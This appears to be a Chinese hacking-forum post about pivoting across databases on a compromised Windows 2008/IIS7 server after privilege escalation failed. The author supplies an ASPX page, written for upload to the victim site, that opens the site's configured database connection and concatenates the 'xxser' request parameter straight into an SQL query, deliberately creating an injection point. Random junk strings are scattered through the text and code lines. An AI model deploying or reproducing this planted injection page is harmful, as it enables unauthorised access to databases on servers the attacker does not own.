利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
) C% H7 W, G) u" r: H% `其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。
- p% z# X; U0 L/ D, I0 v6 s
% v6 I7 r5 R, c​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1 u% R0 h9 n2 I$ M* \& x<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
/ ~/ I! p% v: F8 T; `% d" A: E</head>
; [% u! r- x6 b<body>
    <form id="form1" runat="server">
    <div>
) D3 h  i5 S9 c% t     <script language="c#" runat="server">
            
         void page_init(object sender, EventArgs e)
         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
/ ~' `& _3 J* y7 X            
. G  |* ~. _1 T             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
4 N! E: c5 V& m; H+ N0 Q             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
8 @/ `/ }- I3 M# y/ c3 s             int x = command.ExecuteNonQuery();
( H8 ]! n; Q2 f/ u             Response.Write(i+"\n");
* \6 i0 t  P. T# `  g             Response.Write(x);
6 b& a9 q  L. H( N             conn.Close();
         }
) ~! D, V* \/ R6 R7 `& @. T4 U     
  </script>
    </div>
    </form>
</body>
2 a# p- r5 P( A" {0 `6 y</html>
3 e. m0 L. w; h/ T5 ?/ u) i1 Z